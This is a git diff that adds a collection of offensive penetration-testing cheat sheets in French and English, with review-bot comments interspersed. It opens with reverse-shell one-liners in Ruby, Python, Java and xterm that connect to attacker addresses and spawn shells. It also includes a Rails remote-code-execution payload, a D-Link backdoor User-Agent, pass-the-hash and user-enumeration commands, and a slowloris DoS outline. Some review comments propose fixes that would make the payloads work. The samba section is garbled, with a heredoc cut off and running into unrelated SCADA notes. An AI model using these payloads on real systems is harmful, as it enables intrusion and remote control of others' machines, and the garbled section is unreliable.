+ { $input = fread($socket,4999);fwrite($pipes[0],$input);} }' #hsc
+
+# ruby
+ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' #pm
+
+ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.6.6.6","8888");\
+ while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' #hsc
+
+# python
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' #pm
+
+python -c "import sys, socket, os; \
+ handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM); \
+ handler.connect((str('10.6.6.6'), 8888)); os.dup2(handler.fileno(),\
+ sys.stdin.fileno()); os.dup2(handler.fileno(),sys.stdout.fileno());\
+ os.system('/bin/bash')" #hsc
+
+# powershell (hsc)
+tl;dr
+
+# metasploit (hsc)
+
+# java (pm)
+r = Runtime.getRuntime()
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p.waitFor()
+
+# curl (hsc)
+
+# wget (hsc)
+
+# xterm (pm)
+moi: Xnest :1 ; xhost +targetip
+xterm -display 10.0.0.1:1
+
+# awk
+https://highon.coffee/blog/reverse-shell-cheat-sheet/
+
+# nodejs
+https://wiremask.eu/writeups/reverse-shell-on-a-nodejs-application/
+
+# javascript/rundll32 (windows)
+https://gist.github.com/subTee/f1603fa5c15d5f8825c0 (https://twitter.com/subTee/status/676581725414166529)
+
+# get a tty
+* using expect
+http://pentestmonkey.net/blog/post-exploitation-without-a-tty
+* using python
+python -c 'import pty; pty.spawn("/bin/sh")'
diff --git a/Cheat Sheet/rompager b/Cheat Sheet/rompager
new file mode 100644
index 0000000..09f6e28
--- /dev/null
+++ b/Cheat Sheet/rompager
@@ -0,0 +1,6 @@
+# allegro rompager
+
+* bof and misfortune cookie only affects 4.07 < 4.34 (CVE-2014-9222 and CVE-2014-9223 fixed in 4.34). Both vulns introducded in 4.07.
+https://www.allegrosoft.com/allegro-software-urges-manufacturers-to-maintain-firmware-for-highest-level-of-embedded-device-security/news-press.html
+
+* see 2-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
diff --git a/Cheat Sheet/router b/Cheat Sheet/router
new file mode 100644
index 0000000..fd365d6
--- /dev/null
+++ b/Cheat Sheet/router
@@ -0,0 +1,39 @@
+# router
+
+# Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)
+https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
+https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html
+...
+
+# netgear
+https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/
+
+# autopwn
+https://github.com/jh00nbr/Routerhunter-2.0
+
+# known remote vuln
+http://www.routerpwn.com/
+
+# linksys (WAG200G)/netgear backdoor
+32764/tcp
+https://github.com/elvanderb/TCP-32764/raw/master/backdoor_description.pptx
+
+# dlink backdoor
+http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
+headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'}
+
+# routeur PE
+Provider Edge : Routeur de périphérie du réseau MPLS Mutualisé
+
+Un routeur Provider Edge (PE) se place entre un ISP et d'autres ISP.
+Le terme "routeur PE" désigne un equipement capable de router les protocoles suivants:
+ - BGP
+ - OSPF
+ - MPLS
+(source: wikipedia)
+
+# routeur CPE
+Equipement réseau d’opérateur localisé dans les locaux du Client (Customer Premises Equipment)
+
+Customer Premises Equipment (CPE) est un équipement qui se trouve dans le site d'un client (d'une entreprise) et qui est raccordé à l'infrastructure d'un opérateur
+(source: http://fr.wikipedia.org/wiki/Customer_Premises_Equipment)
diff --git a/Cheat Sheet/rpcclient b/Cheat Sheet/rpcclient
new file mode 100644
index 0000000..783cee4
--- /dev/null
+++ b/Cheat Sheet/rpcclient
@@ -0,0 +1,80 @@
+# rpcclient
+
+## TNG
+rpcclient-tng -S 192.168.53.129 -U '%' # -p 445 if "something about rap failed"
+
+srvinfo wksinfo
+lsaquery
+enumdomains
+dominfo
+
+dispinfo
+enumusers
+
+lsaquery + lookupsids
+lsaenumsid + lookupsids
+
+enumgroups (-g|-m)
+samgroupmem "Admins du domaine" # ou "Domain Admins"
+samaliasmem BUILTIN\administrateurs
+svcenum OU service enum
+registry
+eventlog
+
+## SAMBA
+rpcclient -U '%' 192.168.53.129
+
+getusername
+
+srvinfo
+lsaquery
+dsroledominfo
+enumtrust
+querydominfo
+querydominfo 1
+querydominfo 12
+
+querydispinfo # liste detaillee mais partielle des utilisateurs
+enumdomusers # lister les utilisateurs locaux ou du domaine si DC
+
+lsaquery 5 + lookupsids
+
+enumalsgroups builtin # lister les alias
+queryaliasmem builtin 0x220 # lister les membres de l'alias
+
+# si dans un domaine:
+enumdomgroups
+querygroupmem 0x200 # lister les admins du domaines
+
+## ASTUCES
+
+## pass the hash
+export SMBHASH="xxx:xxx"
+rpcclient -U "administrateur%'
+
+export SMBHASH=qqd3...:9eba...
+./winexe -U administrator //1.2.3.4 "cmd" # marche pas car winexe est 32bit
+
+# SID walkup (if we get STATUS_ACCESS_DENIED) (essayer d'abord avec TNG puis Samba)
+## TNG ou SAMBA
+dominfo (TNG) querydominfo (Samba) -> indique le nombre de users et de groups
+lsaenumsids -> liste des sid
+ou
+lsaquery (TNG) lsaquery 5 (samba)
+lookupsid S-1-5-21-1715567821-1606980848-725345543-1003 -> puis essayer 1004, 1005, ...
+lookupsids ...
+
+https://github.com/trustedsec/ridenum
+impacket/examples/lookupsid.py
+
+# enumerer les membres du groupe BUILTIN\Administrateurs
+# en essayant les sids 1000, 1001, ...
+## SAMBA
+> queryuseraliases builtin S-1-5-21-1715567821-1606980848-725345543-1000 (500, 1001, ...)
+group rid:[0x220]
+> samlookuprids builtin 0x220
+rid 0x220: Administrateurs (4)
+
+## si la machine est dans un domaine, il faut preciser -W
+rpcclient -W SMA-LATESTWINXP -U 'seb%seb' 192.168.53.130
+
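Review bot: The pass-the-hash invocation under "## pass the hash", `rpcclient -U "administrateur%'`, opens with a double quote and closes with a single one, so a shell would sit waiting for the closing `"` instead of running it, and unlike every other rpcclient line in this file it names no target host. A consistent form would be `rpcclient -U 'administrateur%' 192.168.53.129`, with the SMBHASH variable exported on the line above as the note already describes. The `export SMBHASH="xxx:xxx"` line is evidently a placeholder and would read better with `# LM:NT hash, placeholder` appended so it is not copied as-is.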
diff --git a/Cheat Sheet/rpcinfo b/Cheat Sheet/rpcinfo
new file mode 100644
index 0000000..e3728e3
--- /dev/null
+++ b/Cheat Sheet/rpcinfo
@@ -0,0 +1,31 @@
+# rpcinfo / nfs
+
+# mount NFS shares
+https://github.com/bonsaiviking/NfSpy
+mount -vvv -t nfs -o nolock 1.2.3.4:/public /nfsmount
+
+# lister les applications en ecoute sur TCP/UDP:111 ou TCP/UDP:32771
+rpcinfo -p 1.2.3.4
+rpcinfo -n 32771 -p 1.2.3.4
+nmap -sR 1.2.3.4 (-sV inclus -sR)
+
+# lister les NFS shares
+nmap nfs-ls.nse
+
+# rwho 513/udp
+rwho 1.2.3.4
+
+# rusers (RPC program 100002)
+rusers -l 1.2.3.4
+
+# NIS (RPC program 100004)
+pscan/pscan.c (v1.4 par Pluvius) -> essayer -n et -r
+
+# NFS TCP/UDP 2049
+showmount -e 1.2.3.4
+mount 1.2.3.4:/ /mnt/itchy
+ou
+nfsshell
+
+# cool vuln
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-003/?fid=3767
diff --git a/Cheat Sheet/rpm b/Cheat Sheet/rpm
new file mode 100644
index 0000000..d6e6a64
--- /dev/null
+++ b/Cheat Sheet/rpm
@@ -0,0 +1,43 @@
+# rpm
+
+# extract rpm
+mkdir blah && cd blah
+rpm2cpio path/to/pkg.rpm | cpio -idmv
+
+# download src, extract blah.src.rpm under ~/rpmbuild/SOURCES and build the binary pkg
+yum install yum-utils rpm-build
+
+install/enable the srpms repos
+yumdownloader --source
+or
+rpmbuild --rebuild blah.src.rpm
+yum-builddep <./pkg.spec|./pkg.src.rpm> # will automatically install deps
+
+# pam
+rpm -vih ./pam-xx.src.rpm
+rpmbuild -bp SPECS/pam.spec
+(
+cd BUILD
+rm -fr Linux-PAM-1.1.8
+tar xf ../SOURCES/Linux-PAM-1.1.8.tar.bz2
+cp -r Linux-PAM-1.1.8{,-patch}
+cp -r Linux-PAM-1.1.8{,-orig}
+vi Linux-PAM-1.1.8-path/...
+diff -uNr Linux-PAM-1.1.8-orig/ Linux-PAM-1.1.8-patch/ > ~/rpmbuild/SOURCES/blah.patch
+)
+vi SOURCES/pam.spec # add patch
+rpmbuild -bb SOURCES/pam.spec
+yum reinstall RPMS/x86_64/pam-1.1.8-17.el6.x86_64.rpm
+
+# enable debug in pam
+yum install yum-utils rpm-build -y
+wget http://vault.centos.org/7.1.1503/os/Source/SPackages/pam-1.1.8-12.el7.src.rpm
+rpm -ivh ./pam-1.1.8-12.el7.src.rpm
+yum-builddep rpmbuild/SPECS/pam.spec
+sed -i -e 's,^%configure ,%configure --enable-debug ,' rpmbuild/SPECS/pam.spec
+rpmbuild -bb rpmbuild/SPECS/pam.spec
+rpm -Uvh rpmbuild/RPMS/x86_64/pam-1.1.8-12.el7.centos.x86_64.rpm
+echo 'touch /var/run/pam-debug.log; chmod 622 /var/run/pam-debug.log' >> /etc/rc.d/rc.local
+reboot
+# to reinstall official version
+yum downgrade pam
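Review bot: The edit step in the "# pam" recipe opens `Linux-PAM-1.1.8-path/...` while the copy two lines earlier creates `Linux-PAM-1.1.8-patch`, so the `diff -uNr` that follows would compare two identical trees and produce an empty patch; the line should read `vi Linux-PAM-1.1.8-patch/...`. In the "# enable debug in pam" recipe, the `chmod 622 /var/run/pam-debug.log` appended to rc.local makes the debug log writable by every user on the host, and the closing `yum downgrade pam` restores the package but does not remove that rc.local line; a comment such as `# also remove the pam-debug.log line from /etc/rc.d/rc.local when done` would complete the cleanup. Whatever the `--enable-debug` build writes there is presumably authentication-related, so the log is worth treating as sensitive even on a test box.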
diff --git a/Cheat Sheet/rsa b/Cheat Sheet/rsa
new file mode 100644
index 0000000..ad8129e
--- /dev/null
+++ b/Cheat Sheet/rsa
@@ -0,0 +1,33 @@
+# rsa
+
+factordb.com may know the prime factors p and q for a given N
+
+* fermat's little theorem states that if p is a prime number
+a^(p-1) = 1 (mod p)
+so
+a^(p-2) * a = 1 (mod p)
+a^(p-2) = a^-1 (mod p)
+
+Q = M * P^A (mod B) we can find P^A with: Q * M^-1 and M^-1 = M^(B-2) (mod B)
+so P^A = Q * M^(B-2) % B and then we need P^-A = P^A^(B-2) (mod B)
+we can then decipher flag M2 with: Q * P^-A % B
+
+* good quick overview
+http://doctrina.org/How-RSA-Works-With-Examples.html
+
+* extract modulus and exponent
+cat pubkey.pem | grep -v -- ----- | tr -d '\r\n' | base64 -d | openssl asn1parse -inform DER -i -strparse 18
+
+* well known attacks
+known factors (factordb etc.)
+common modulus (2 keys with same modulus)
+twin prime (p & q are very close -> fermats)
+common factors (2 moduli with a common prime factor (can be p or q))
+huge modulus -> pow(m, e) didnt wrap so simply decrypt with pow(c, 1/e)
+big exponent -> small d -> wiener attack (or boneh burfee) possible when d < 1/3*N^(1/4)
+very small exponent (like e=3)
+broadcast (same plaintext encrypted with different Ns without padding)
+moar at https://github.com/mimoo/RSA-and-LLL-attacks
+
+* Franklin-Reiter related-message attack (when e=3)
+https://en.wikipedia.org/wiki/Coppersmith%27s_attack#Franklin-Reiter_related-message_attack
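Review bot: The inverse in the worked example is written `P^-A = P^A^(B-2) (mod B)`, which leaves the precedence ambiguous; the exponent applies to the whole of P^A, i.e. `P^-A = (P^A)^(B-2) (mod B)`, and as with the `M^-1 = M^(B-2)` step this only holds when B is prime, which is the hypothesis of the theorem quoted at the top. In the "well known attacks" list, `boneh burfee` should be `Boneh-Durfee`. The `-strparse 18` offset in the asn1parse pipeline appears to depend on the key size, since the outer SEQUENCE length encoding shifts the position of the inner BIT STRING; a comment like `# 18 fits a 1024-bit key, read the offset from a first plain asn1parse run` would save a confusing error on other key sizes.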
diff --git a/Cheat Sheet/ruby b/Cheat Sheet/ruby
new file mode 100644
index 0000000..fb3f9e4
--- /dev/null
+++ b/Cheat Sheet/ruby
@@ -0,0 +1,151 @@
+# ruby
+
+https://www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet
+https://groups.google.com/forum/#!forum/rubyonrails-security
+http://www.learnstreet.com/lessons/study/ruby
+http://rails-sqli.org/
+http://guides.rubyonrails.org/security.html # the usual security issues and countermeasures
+
+# info disclosure
+cause an error in rails
+production != development mode => look for sensitive info (secret key used for cookies hmac)
+http://website/home?a=1&a[]=1 # discovered by a brisbane guy bjeanes
+http://website/home?x[y]=1&x[y]z=2 # one of the test cases on github
+
+will also tell if it's rails or another ruby framework such as Sinatra
+
+# see talk by joernchen of Phenoelit at hitb 2012
+
+# mass assignment
+http://guides.rubyonrails.org/v3.2.9/security.html#mass-assignment
+try every field if it's not rails 4 (https://code.tutsplus.com/tutorials/mass-assignment-rails-and-you--net-31695)
+
+# SQLi in RoR CVE-2012-5664
+https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM
+
+# use #{} to evaluate code. Using the %x arg we were able to execute shell commands.
+http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/
+POST {“listing”:{“directions”:[{“test”:”test1″}]}} instead of {“listing”:{“directions”:”test”}} => "directions":"---\n- !ruby/hash:ActionDispatch::Http::ParamsHashWithIndifferentAccess\n test: test1\n"
+POST {"listing":{"directions":[{"test":[{"abc":"#{1+1}"}]}] }} => abc: ! ‘2’
+POST {“listing”:{“directions”:[{“test”:[{“abc”:”#{%x[‘ls’]}+foo”}]}] }} => rce
+
+# reset pw
+session[params[:token]] # there will always be session_id and _csrf_token in the session dictionary
+https://gist.github.com/joernchen/9dfa57017b4732c04bcc http://www.akitaonrails.com/2014/08/28/small-bite-session-injection-challenge
+
+# Action Pack vuln: insecure deserialisation when sending YAML within a XML or JSON request
+https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156 # XML+YAML
+http://www.insinuator.net/2013/01/rails-yaml/
+http://ronin-ruby.github.io/blog/2013/01/09/rails-pocs.html
+https://community.rapid7.com/community/metasploit/blog/2013/01/29/exploit-for-ruby-on-rails-cve-2013-0333 # JSON+YAML
+http://ronin-ruby.github.io/blog/2013/01/28/new-rails-poc.html
+https://charlie.bz/blog/rails-3.2.10-remote-code-execution
+https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 # walkthrough using the msf scanner and exploit modules
+
+* CVE-2013-0156 (YAML)
+https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
+Versions Affected: ALL
+Fixed Versions: 3.2.11, 3.1.10, 3.0.19, 2.3.15
+
+* CVE-2013-0333 (JSON)
+https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
+Versions Affected: 2.3.x, 3.0.x
+Not Affected: 3.1.x, 3.2.x, applications using the yaml gem.
+Fixed Versions: 3.0.20, 2.3.16
+
+To test using a page with no body:
+pick a GET request and change it to a POST request
+add X-HTTP-Method-Override: GET
+ - xml/yaml
+change Content-Type: application/xml
+payload | vuln | not vuln
+-------------------------------------------------
+blah | 200 | 200
+valid yaml | 200 | 500
+invalid yaml | 500 | 500
+
+ - json/yaml
+change Content-Type: application/json
+payload | vuln | not vuln
+----------------------------------
+{"asdf": "asdf"} | 200 | 200
+--- {} | 200 | 500
+invalid yaml | 500 | 500
+
+To test using on a page with an existing body:
+if body is: user[firstname]=david&user[lastname]=...
+change to xml with: curl -v 'http://192.168.122.224:3000/products?authenticity_token=F8...' -d 'david ' -H 'Content-Type: application/xml'
+if there's authenticity_token in the body, I can move it into the query string
+if there's _method=PUT in the request, I can move it into headers => X-HTTP-Method-Override: PUT # rack/test/spec_methodoverride.rb
+
+look at msf exploits
+
+plop = "salut"
+require 'yaml'
+YAML.dump(plop)
+=> "--- salut\n...\n"
+
+# audit source code / checklist of things to check
+brakeman
+
+# regular expressions are multi-lines by default
+/^\d+$/ will match "arbitrary data\n123\narbitrary data"
+
+# rack
+Rack is used by almost all Ruby web frameworks, such as RoR and Sinatra
+* rack cookies
+rack.session=BAh
+_brainfit_session=BAh // brainfit is the name of the app: rails new brainfit
+
+decode cookie using pentesterlab's script rack_cookie.rb
+
+si c'est du rails4 alors le cookie est chiffre
+
+# fingerprint
+Rails often runs on top of the Apache, NginX, Thin, and WEBrick servers
+Rails may be only be accessible at a certain path, such as /forum or /redmine
+Rails may be listening on a non-standard port, such as 3000, 4567, or 8888
+
+X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
+X-Rack-Cache: miss
+Set-Cookie: _appname_session=(base64)%3D%3D--(hexadecimal)
+
+# csrf bypass CVE-2011-0447
+http://weblog.rubyonrails.org/2011/2/8/csrf-protection-bypass-in-ruby-on-rails/
+
+# rails tuto
+http://guides.rubyonrails.org/getting_started.html
+
+# login bypass in rails restful_authentication plugin (28/10/2007)
+/activate/?activation_code= => SELECT * FROM users WHERE (users.`activation_code` IS NULL) LIMIT 1 // and login w/o password as the first account
+http://www.rorsecurity.info/2007/10/28/restful_authentication-login-security/
+
+# install rails
+https://wiki.archlinux.org/index.php/Ruby_on_Rails
+
+# install vuln rails
+gem install rails -v 3.2.10
+rails new blog
+rails g controller products
+echo 'resources :products' >> config/routes.rb
+echo -e 'skip_before_filter :verify_authenticity_token\ndef create\np params\nend' >> app/controllers/products_controller.rb // add config.relative_url_root = "" for rails-3.0.x
+echo 'hello <%= params %>' >> app/views/products/create.erb
+rails server -b 0.0.0.0
+
+# rvm
+* switch to another version
+source $(rvm 2.1.5 do rvm env --path)
+
+# rubygems
+https://wiki.archlinux.org/index.php/Ruby
+gem list
+gem spec rubydns
+gem list --remote rubydns
+gem install rubydns --no-rdoc --no-ri
+gem install rails -v 3.2.10
+gem update
+
+gem install bundler
+export GEM_HOME=~/.gem/ruby/2.0.0
+export PATH=$PATH:$GEM_HOME/bin
+bundle install # reads deps' versions from Gemfile
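Review bot: The three POST bodies under the string-interpolation heading were pasted with typographic quotes (`“`, `”`, `‘`, `’`), which are not valid JSON string delimiters, so sending them as written would yield a parse error rather than the responses noted after `=>`; they should be plain ASCII `"` and `'`. In "# install vuln rails", `echo -e '...' >> app/controllers/products_controller.rb` appends after the generated class's closing `end`, so `skip_before_filter` and `create` would presumably land at top level rather than inside `ProductsController`; the lines need to go before the final `end`, for example by deleting the last line first and re-adding `end` after the echo. The regex note (`/^\d+$/` matching across lines) would be more useful with the fix beside it: `# validate with /\A\d+\z/ — ^ and $ are line anchors in Ruby`.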
diff --git a/Cheat Sheet/rxvt b/Cheat Sheet/rxvt
new file mode 100644
index 0000000..8d7dd46
--- /dev/null
+++ b/Cheat Sheet/rxvt
@@ -0,0 +1,7 @@
+# rxvt
+
+#printf '\e]710;%s\007' "xft:Terminus:pixelsize=22"
+printf '\e]710;%s\007' "xft:Monospace:pixelsize=22"
+printf '\e]39;%s\007' "black"
+printf '\e]49;%s\007' "white"
+http://www.usf.uni-osnabrueck.de/infoservice/doc/localhtml/rxvt/refer.html#Sequences mais vaut mieux lire le man qui est plus complet
diff --git a/Cheat Sheet/samba b/Cheat Sheet/samba
new file mode 100644
index 0000000..d8c5943
--- /dev/null
+++ b/Cheat Sheet/samba
@@ -0,0 +1,41 @@
+# samba
+
+# anonymous writable share
+cat > /etc/samba/smb.conf < station de controle (os win)
+stuxnet visait systeme windows avec SIMATIC WinCC SCADA ou PCS7 et S7-PLC, logiciels qui controlent des PLC de type Siemens
+
+https://github.com/scadastrangelove/SCADAPASS
+
+# hsc newsletter
+http://www.hsc-news.com/archives/2007/000036.html
+http://www.hsc-news.com/archives/2008/000044.html
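Review bot: The heredoc under "# anonymous writable share" is cut off: `cat > /etc/samba/smb.conf <` runs straight into `station de controle (os win)` and the SCADA notes that follow, and the hunk header announces 41 lines where only 11 are present, so the share definition this section is named for is missing. This looks like rendering that dropped everything between that `<` and a later `>`, presumably the heredoc delimiter and the smb.conf body; the raw commit should be checked and the share block restored before this file is relied on. When it is restored, a comment such as `# lab only: anonymous write access, bind it to the test interface` would fit the heading.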
diff --git a/Cheat Sheet/scapy b/Cheat Sheet/scapy
new file mode 100644
index 0000000..8143dcc
--- /dev/null
+++ b/Cheat Sheet/scapy
@@ -0,0 +1,27 @@
+# scapy
+
+ls() # list layers
+lsc() # high-level functions
+
+wireshark(pkts)
+
+sr()
+sr1()
+
+fuzz()
+
+load_module("p0f")
+load_module("nmap")
+
+make_table # (comparer IPID, les routeurs traversés pour des machines voisines, etc)
+
+conf.checkIPaddr = False # don't check that replies come from the expected IP address
+multi=True # wait for more answer packets after the first response is received
+
+# TCP sequence number fingerprinting
+
+## afficher toutes les URL
+>>> raws = [r[Raw] for r in pkts if Raw in r]
+>>> urls = set([r.load.splitlines()[0].split(' ')[1] for r in raws if r.load.splitlines()[0].startswith('GET')])
+>>> print '\n'.join(urls)
+
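Review bot: The URL extraction under "## afficher toutes les URL" indexes `splitlines()[0]` and `split(' ')[1]` without a guard, so a Raw layer with an empty payload raises IndexError in the comprehension's condition and a first line with no space raises on the second index. Filtering on the payload prefix avoids both: `urls = set([r.load.splitlines()[0].split(' ')[1] for r in raws if r.load.startswith('GET ')])`, since a `GET ` prefix guarantees the first line is non-empty and contains a space. The `print '\n'.join(urls)` line is Python 2 syntax, worth a `# python2 / scapy 2.x` comment so the snippet is not pasted unchanged into a Python 3 scapy session.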
diff --git a/Cheat Sheet/sccm b/Cheat Sheet/sccm
new file mode 100644
index 0000000..0c94c87
--- /dev/null
+++ b/Cheat Sheet/sccm
@@ -0,0 +1,3 @@
+# sccm
+
+https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/
diff --git a/Cheat Sheet/scraper_crawler_spider b/Cheat Sheet/scraper_crawler_spider
new file mode 100644
index 0000000..1b18d87
--- /dev/null
+++ b/Cheat Sheet/scraper_crawler_spider
@@ -0,0 +1,12 @@
+# scraper
+
+https://xato.net/passwords/understanding-password-dumps/
+Dumpmon
+Pystemon
+
+# web crawler/spider
+wget
+httrack
+heritix (web gui)
+crawler4j (faut ecrire une classe java)
+nutch (prereq tomcat?)
diff --git a/Cheat Sheet/screenshot b/Cheat Sheet/screenshot
new file mode 100644
index 0000000..dc7c9e4
--- /dev/null
+++ b/Cheat Sheet/screenshot
@@ -0,0 +1,10 @@
+# screenshot webkit
+
+https://github.com/graphcool/chromeless
+http://w00tsec.blogspot.com.au/2014/08/scan-internet-screenshot-all-things.html
+
+https://github.com/dxa4481/Snapper
+http://cutycapt.sourceforge.net/
+https://github.com/paulhammond/webkit2png/
+https://github.com/eelsivart/vnc-screenshot
+https://bitbucket.org/LaNMaSteR53/peepingtom
diff --git a/Cheat Sheet/scrutinizer b/Cheat Sheet/scrutinizer
new file mode 100644
index 0000000..205cd9d
--- /dev/null
+++ b/Cheat Sheet/scrutinizer
@@ -0,0 +1,3 @@
+# scrutinizer
+
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2012-014/
diff --git a/Cheat Sheet/selinux b/Cheat Sheet/selinux
new file mode 100644
index 0000000..d3ca289
--- /dev/null
+++ b/Cheat Sheet/selinux
@@ -0,0 +1,28 @@
+# selinux
+
+# good intro
+http://fedoraproject.org/wiki/SELinux/Troubleshooting
+
+# activer les logs
+# https://wiki.gentoo.org/wiki/SELinux/Tutorials/Where_to_find_SELinux_permission_denial_details
+# tl;dr:
+ denials are logged in the avc.log (no audit daemon running) or audit.log (audit daemon running) log files
+ denials might be obscured through dontaudit statements, which you can disable using semodule -DB and re-enable through semodule -B
+ the denial logging gives you great detail about who (process information, including security context) is trying to do what (permission) against something (target information, including security context)
+
+semodule -DB # Turn on all AVC Messages for which SELinux currently is "dontaudit"ing.
+sealert -a /var/log/audit/audit.log > /tmp/mylogfile.txt # human readable logs, sealert -> yum install setroubleshoot-server
+
+
+~# cat > portage_noatsecure.te << EOF
+module portage_noatsecure 1.0;
+require {
+ type portage_t;
+ type setfiles_t;
+ class process { noatsecure };
+}
+allow portage_t setfiles_t:process { noatsecure };
+EOF
+~# checkmodule -m -o portage_noatsecure.mod portage_noatsecure.te
+~# semodule_package -o portage_noatsecure.pp -m portage_noatsecure.mod
+~# semodule -i portage_noatsecure.pp
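Review bot: The policy module written by the heredoc grants `portage_t` the `noatsecure` permission towards `setfiles_t` with no comment on why, and that permission is security-relevant: as its name says, it tells the kernel not to raise AT_SECURE on the domain transition, so the target domain skips the secure-execution environment sanitisation it would otherwise get. A line inside the `.te` such as `# lets portage run setfiles without AT_SECURE; needed because <reason>; revisit on policy upgrade` keeps the justification with the rule so it is not copied blindly. The `semodule -DB` line disables every dontaudit rule system-wide and the tl;dr above says `semodule -B` restores them; placing `semodule -B # re-enable dontaudit when done` next to it avoids leaving the audit log permanently noisy.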
diff --git a/Cheat Sheet/shadow b/Cheat Sheet/shadow
new file mode 100644
index 0000000..1faa94e
--- /dev/null
+++ b/Cheat Sheet/shadow
@@ -0,0 +1,21 @@
+# password shadow
+
+# Redirection de port avec un compte dont le Shell est /bin/false
+- dont le shell est un fichier executable par le compte
+- qui n'est pas verrouillé (user:*:9797 => non verrouillé, user:!:9797 => verrouillé)
+- la redirection de port est activé dans SSH
+- j'ai pu ajouter ma clef publique dans son .ssh/authorized_keys (ou .ssh/authorized_keys2)
+
+=> Alors il est possible de faire:
+ssh -N -L 31337:127.0.0.1:1501 nobody@victim
+afin de se connecter sur la base oracle qui n'ecoute qu'en local.
+
+# mes questions
+- si un compte est dans /etc/passwd mais pas dans /etc/shadow
+=> le compte est actif avec un mot de passe vide
+
+- quelle difference entre /bin/false et /bin/nologin ?
+=> man nologin et man false
+
+- gentoo: à quoi sert ce compte operator?
+=> je sais toujours pas...
diff --git a/Cheat Sheet/sharepoint b/Cheat Sheet/sharepoint
new file mode 100644
index 0000000..45cb71b
--- /dev/null
+++ b/Cheat Sheet/sharepoint
@@ -0,0 +1,5 @@
+# sharepoint
+
+sparty.secniche.org
+
+https://github.com/sensepost/SPartan
diff --git a/Cheat Sheet/sip b/Cheat Sheet/sip
new file mode 100644
index 0000000..1ccfd0c
--- /dev/null
+++ b/Cheat Sheet/sip
@@ -0,0 +1,3 @@
+# sip
+
+http://packetstormsecurity.com/files/107301/SIP-Army-Knife-Fuzzer-11232011.html
diff --git a/Cheat Sheet/sleuthkit b/Cheat Sheet/sleuthkit
new file mode 100644
index 0000000..9e74b89
--- /dev/null
+++ b/Cheat Sheet/sleuthkit
@@ -0,0 +1,6 @@
+# sleuthkit
+
+# timeline
+fls -r -m C: sd-cons_c.dd >> sd-cons.body
+fls -r -m D: sd-cons_d.dd >> sd-cons.body
+mactime -d -b sd-cons.body -z GMT+2 > sd-cons.mactime
diff --git a/Cheat Sheet/slowloris b/Cheat Sheet/slowloris
new file mode 100644
index 0000000..ca9cbbf
--- /dev/null
+++ b/Cheat Sheet/slowloris
@@ -0,0 +1,67 @@
+# slowloris
+
+http://ha.ckers.org/blog/20090617/slowloris-http-dos/
+http://isc.sans.org/diary.html?storyid=6601
+http://isc.sans.org/diary.html?storyid=6613
+
+Post de Adrian Ilarion Ciobanu datant de debut 2007 qui décrit parfaitement
+cette attaque de DoS (http://pub.mud.ro/~cia/computing/apache-httpd-denial-of-service-example.html)
+Elle a aussi été décrite en 2005 dans la section "Programming Model Attacks" de
+Apache Security
+
+Permet de mettre à mal un seul site web sans envoyer abondament du traffic TCP
+ou HTTP comme dans une attaque DoS typique.
+
+Seuls certains serveur web sont impactés
+lighttpd 1.4.20 - vulnerable
+apache 2.2.11 - vulnerable
+sun web server - vulnerable
+
+squid - NOT vulnerable
+nginx 0.8.3 - NOT vulnerable
+cherokee 0.99.17 - NOT vulnerable
+
+C'est vraiment un DoS au niveau HTTP, si on a un Apache et un IIS sur la meme
+machine, le IIS ne sera pas affecté par l'attaque.
+
+* Principe de la technique
+Le client envoie interminablement des entetes bidons dans sa requete GET, ce
+qui accapare le serveur qui reste en attente de la ligne vide (^\r\n) qui
+marque la fin de la requete.
+Une seule connection peut accaparer un processus pendant 5' (par defaut la
+directive TimeOut est à 300s), après cela il doit ouvrir une nouvelle connexion.
+
+GET / HTTP/1.1\r\n
+Host: host\r\n
+User-Agent: Mozilla/4.0
+Content-Length: 42\r\n
+
+entete bidon => X-a: b\r\n
+
+* Attenuations et contre-mesures
+- load balancers ou reverse proxies: il est possible qu'on ne soit pas affecté,
+il faut vérifier son installation
+Frank Breedijk atteste que Slowloris est impuissant contre un equilibreur de charge Cisco CSS (http://www.cupfighter.net/index.php/2009/06/slowloris-css/)
+- la directive TimeOut: combien de temps Apache attend de recevoir une requete
+GET ou POST
+Mais meme si on diminue à 5s, il suffit de generer plus de traffic (2MB/min) =
+~45kb/sec ce qui sifnifie q'un abonné ADSL 512k est capable
+- module mod_limitipconn qui limite le nombre de connections pour 1 meme
+adresse IP
+Mais pb des utilisateurs derriere un proxy d'entreprise
+Et de toute façon cela stoppera un script kiddie mais pas un attaquant
+chevronné ayant à sa disposition une 12 de machines
+
+* important à savoir
+default number of connections is 256
+default TimeOut: 300 (5 minutes)
+
